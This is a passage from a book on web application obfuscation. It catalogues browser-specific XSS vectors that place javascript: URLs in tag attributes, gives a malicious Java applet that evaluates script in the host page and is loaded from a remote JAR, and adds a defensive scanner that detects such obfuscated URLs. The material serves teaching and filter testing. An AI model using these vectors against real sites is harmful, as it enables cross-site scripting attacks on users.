Web Application Obfuscation


Basic markup obfuscation

from Firefox and Chromium are not all that surprising, another user agent really goes wild. We are talking about Opera.

    <iframe src="javascript:alert(1)">            // FF, Chromium, IE8 and Opera
    <embed src="javascript:alert(2)">             // FF, Chromium and Opera
    <embed code="javascript:alert(3)">            // Chromium only
    <img src="javascript:alert(4)">               // Opera 10 and IE6
    <image src="javascript:alert(5)">             // Opera 10 and IE6
    <body background="javascript:alert(5)">       // Opera 10 and IE6
    <script src="javascript:alert(6)">            // Opera 10 and IE6
    <table background="javascript:alert(7)">      // Opera 10 and IE6
    <isindex type="image" src="javascript:alert(8)">  // IE6-7

Opera's markup parser seems to have a pretty weird understanding of when to execute JavaScript from source attributes. The behavior shown here is similar to that of IE 6, because the same edge cases execute JavaScript on this browser too, complemented by the ancient and already mentioned attributes dynsrc and lowsrc. Also, let us not forget the applet tag, in which the attributes code and archive can be used to fetch JAR files and pick a class to work with. Since applets can interact with the DOM of a Web site and other instances, those tag attribute combinations can be considered rather dangerous. Here is some example Java code for a malicious applet and the necessary markup to execute the code:

    //XSS.java
    import java.applet.Applet;
    import netscape.javascript.*;

    public class XSS extends Applet {
        public void start() {
            try {
                // Obtain the hosting page's window object and evaluate JavaScript in it
                JSObject window = JSObject.getWindow(this);
                window.eval("alert(document.domain)");
            } catch (JSException jse) {
                jse.printStackTrace();
            }
        }
    }

    //test.html
    <applet code="XSS" archive="http://someserver.com/xss.jar"></applet>
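The following is an added example and not code from the book: a scanner that reports any of the source-type attributes discussed above (src, background, code, archive, plus dynsrc and lowsrc) whose value resolves to a javascript: URL once the obfuscation tricks a browser silently undoes (numeric character references, embedded tab/CR/LF, leading whitespace, mixed case) are normalized away. The attribute list, the sample markup and the function names are this example's own assumptions; it checks only the URL scheme, so a JAR fetched through applet code/archive is outside its scope.

```javascript
// Added example, not from the book: scan markup for the source-type attributes
// listed above (src, background, code, archive, plus dynsrc/lowsrc) and report any
// whose value resolves to a javascript: URL once common obfuscation is undone.
const URL_ATTRS = new Set(["src", "background", "code", "archive", "dynsrc", "lowsrc"]);

// Decode decimal and hex numeric character references (&#106; / &#x6A;) the way
// the HTML tokenizer does before the URL is ever seen; leave out-of-range values alone.
function decodeNumericRefs(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (m, body) => {
    const cp = body[0].toLowerCase() === "x" ? parseInt(body.slice(1), 16) : parseInt(body, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

// URL parsers strip leading C0 controls/spaces and remove tab, CR and LF anywhere,
// so "jav\tascript:" or " javascript:" reach the scheme check as "javascript:".
function normalizeUrl(value) {
  return decodeNumericRefs(value)
    .replace(/[\t\r\n]/g, "")
    .replace(/^[\x00-\x20]+/, "")
    .toLowerCase();
}

// Return one {tag, attr, value} record per attribute that carries a javascript: URL.
function findScriptUrls(markup) {
  const hits = [];
  const tagRe = /<([a-z][a-z0-9]*)\b([^>]*)>/gi;
  const attrRe = /([a-z][a-z0-9-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;
  for (let t; (t = tagRe.exec(markup)) !== null; ) {
    attrRe.lastIndex = 0;
    for (let a; (a = attrRe.exec(t[2])) !== null; ) {
      const attr = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? "";
      if (URL_ATTRS.has(attr) && normalizeUrl(value).startsWith("javascript:")) {
        hits.push({ tag: t[1].toLowerCase(), attr, value });
      }
    }
  }
  return hits;
}

// Constructed sample: one benign image plus obfuscated variants of the page's cases.
const SAMPLE = [
  '<img src="https://example.test/logo.png">',
  '<img src="javascript:alert(4)">',
  '<iframe SRC="  jav&#x61;script:alert(1)">',
  "<embed code='java\tscript:alert(3)'>",
  '<table background="java&#10;script:alert(7)">',
].join("\n");

console.log(findScriptUrls(SAMPLE)); // four hits; the plain https image is not reported
```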

Quirks modes are implemented in almost all user agents and provide a mode for rendering markup that does not necessarily follow any standards given by the W3C so that it is as compatible as possible with older and invalidly composed Web sites. It also means a developer cannot really predict what the user agent is doing with the Web site—and sometimes that hidden or deprecated features are being reenabled.


